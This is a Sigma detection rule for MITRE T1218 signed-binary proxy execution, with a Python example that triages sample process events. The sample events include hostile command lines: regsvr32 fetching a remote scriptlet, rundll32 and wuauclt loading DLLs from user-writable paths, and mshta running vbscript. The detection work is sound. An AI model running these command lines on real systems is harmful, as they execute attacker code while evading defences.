title: System Binary Proxy Execution (T1218)
id: df00tech-t1218
status: experimental
description: "Adversaries may bypass process- and signature-based defenses by proxying execution of malicious content through signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, either shipped with the operating system or downloaded from Microsoft, so they pass signature validation and are frequently allow-listed. Several Microsoft-signed binaries present on default Windows installations can proxy execution of other files or commands. The sub-techniques cover mshta.exe, rundll32.exe, regsvr32.exe, msiexec.exe, cmstp.exe, installutil.exe, regsvcs.exe and regasm.exe, odbcconf.exe, verclsid.exe, mavinject.exe, control.exe (Control Panel items), compiled HTML files (hh.exe), MMC snap-ins, and Electron applications. On Linux, trusted binaries such as split may be abused in the same way. Documented procedure examples include Lazarus Group abusing wuauclt.exe to load malicious DLLs and Volt Typhoon broadly leveraging LOLBins to maintain and expand network access."
references:
  - https://attack.mitre.org/techniques/T1218/
  - https://df00tech.com/detections/T1218
author: df00tech
date: 2026/04/13
tags:
  - attack.t1218
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # Baseline selection: creation of the signed proxy binaries named in the description.
  # On its own this is broad (see falsepositives); the tuned command-line and
  # parent-process conditions are in the KQL/SPL query on df00tech. Electron
  # applications have no fixed image name and are therefore not listed here.
  selection:
    Image|endswith: ['\mshta.exe', '\rundll32.exe', '\regsvr32.exe', '\msiexec.exe',
                     '\cmstp.exe', '\installutil.exe', '\regsvcs.exe', '\regasm.exe',
                     '\odbcconf.exe', '\verclsid.exe', '\mavinject.exe', '\control.exe',
                     '\hh.exe', '\mmc.exe', '\wuauclt.exe']
  condition: selection
falsepositives:
  - Legitimate software installers using msiexec.exe or installutil.exe during application deployment
  - "Administrative scripts and IT management tools (SCCM, PDQ Deploy) invoking rundll32.exe or regsvr32.exe for component registration"
  - "Corporate HTA-based applications (legacy web apps, admin dashboards) legitimately executed via mshta.exe"
  - VPN and security software installers using cmstp.exe to configure connection profiles during initial setup
  - Windows Update processes legitimately invoking wuauclt.exe as part of the update delivery mechanism
level: high
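The rule's description lists the signed binaries, but what separates abuse from the false positives listed above is the command line and the parent process. The Python below is an added example, not df00tech's query or code from the Sigma project: it runs a small triage over constructed process_creation events (Sysmon Event ID 1 style) and sorts each into alert, review, suppressed, or no_match. The parent-process names it treats as benign (ccmexec.exe for SCCM, pdqdeployrunner.exe for PDQ Deploy, svchost.exe for the Windows Update service) and the three command-line traits it keys on are assumptions made for the example, and the sample events and paths are constructed.

```python
"""Added example (not df00tech or Sigma code): triage constructed
process_creation events against the T1218 proxy-binary list."""
from dataclasses import dataclass
import re

# Signed Windows binaries named in the rule description (basenames, lowercase).
PROXY_BINARIES = {
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "cmstp.exe",
    "installutil.exe", "regsvcs.exe", "regasm.exe", "odbcconf.exe",
    "verclsid.exe", "mavinject.exe", "control.exe", "hh.exe", "mmc.exe",
    "wuauclt.exe",
}

# Parents standing in for the falsepositives entries. Assumption for this
# example: ccmexec.exe is the SCCM client, pdqdeployrunner.exe the PDQ Deploy
# runner, and svchost.exe hosts the Windows Update service that starts wuauclt.
BENIGN_PARENTS = {"msiexec.exe", "ccmexec.exe", "pdqdeployrunner.exe", "svchost.exe"}

# Command-line traits that usually separate abuse from the benign cases above.
# These are the example's own heuristics, not part of the rule on this page.
SUSPICIOUS_CMDLINE = {
    "remote_url": re.compile(r"https?://", re.I),
    "user_writable_path": re.compile(r"\\(Users\\[^\\]+\\AppData|Temp|ProgramData)\\", re.I),
    "script_protocol": re.compile(r"\b(javascript|vbscript):", re.I),
}

LABELS = ("alert", "review", "suppressed", "no_match")


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 / Security 4688 record."""
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def selection_matches(ev: ProcessEvent) -> bool:
    """The Sigma 'Image|endswith' part: is this one of the proxy binaries?"""
    return basename(ev.image) in PROXY_BINARIES


def suspicious_traits(ev: ProcessEvent) -> list[str]:
    """Names of the command-line traits present in the event, in dict order."""
    return [name for name, rx in SUSPICIOUS_CMDLINE.items() if rx.search(ev.command_line)]


def classify(ev: ProcessEvent) -> str:
    """alert: proxy binary with a suspicious command line, whatever the parent.
    suppressed: proxy binary launched by a deployment/update parent, nothing odd.
    review: proxy binary from an unexpected parent but no strong indicator."""
    if not selection_matches(ev):
        return "no_match"
    if suspicious_traits(ev):
        return "alert"
    if basename(ev.parent_image) in BENIGN_PARENTS:
        return "suppressed"
    return "review"


def triage(events) -> dict[str, list[str]]:
    """Group events by label, keeping the image basename for reporting."""
    return {label: [basename(e.image) for e in events if classify(e) == label]
            for label in LABELS}


# Constructed sample events; 203.0.113.10 is a documentation (TEST-NET-3) address
# and the PDQ runner path is assumed, not taken from a real install.
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    ProcessEvent(SYS32 + "rundll32.exe",
                 "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll,DllMain",
                 SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe"),
    ProcessEvent(SYS32 + "regsvr32.exe",
                 "regsvr32.exe /s /i:http://203.0.113.10/reg.sct scrobj.dll",
                 SYS32 + "cmd.exe"),
    ProcessEvent(SYS32 + "regsvr32.exe",
                 "regsvr32.exe /s \"C:\\Program Files\\Vendor\\component.dll\"",
                 "C:\\Windows\\AdminArsenal\\PDQDeployRunner.exe"),
    ProcessEvent(SYS32 + "msiexec.exe",
                 "msiexec.exe /i C:\\Users\\bob\\Downloads\\setup.msi /qn",
                 "C:\\Windows\\explorer.exe"),
    ProcessEvent(SYS32 + "mshta.exe",
                 "mshta.exe vbscript:Close(Execute(\"MsgBox 1\"))",
                 SYS32 + "cmd.exe"),
    ProcessEvent(SYS32 + "wuauclt.exe", "wuauclt.exe /detectnow", SYS32 + "svchost.exe"),
    ProcessEvent(SYS32 + "wuauclt.exe",
                 "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\hnd.dll /RunHandlerComServer",
                 SYS32 + "cmd.exe"),
    ProcessEvent(SYS32 + "notepad.exe", "notepad.exe", "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for label, images in triage(SAMPLE_EVENTS).items():
        print(f"{label:10s} {images}")
```

The order of checks matters: a suspicious command line wins over a benign parent, so a payload dropped through a deployment tool is still raised, while the review bucket catches proxy binaries started from unexpected parents (here explorer.exe launching msiexec on a download) without a strong indicator, which is where the listed false positives land after tuning.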
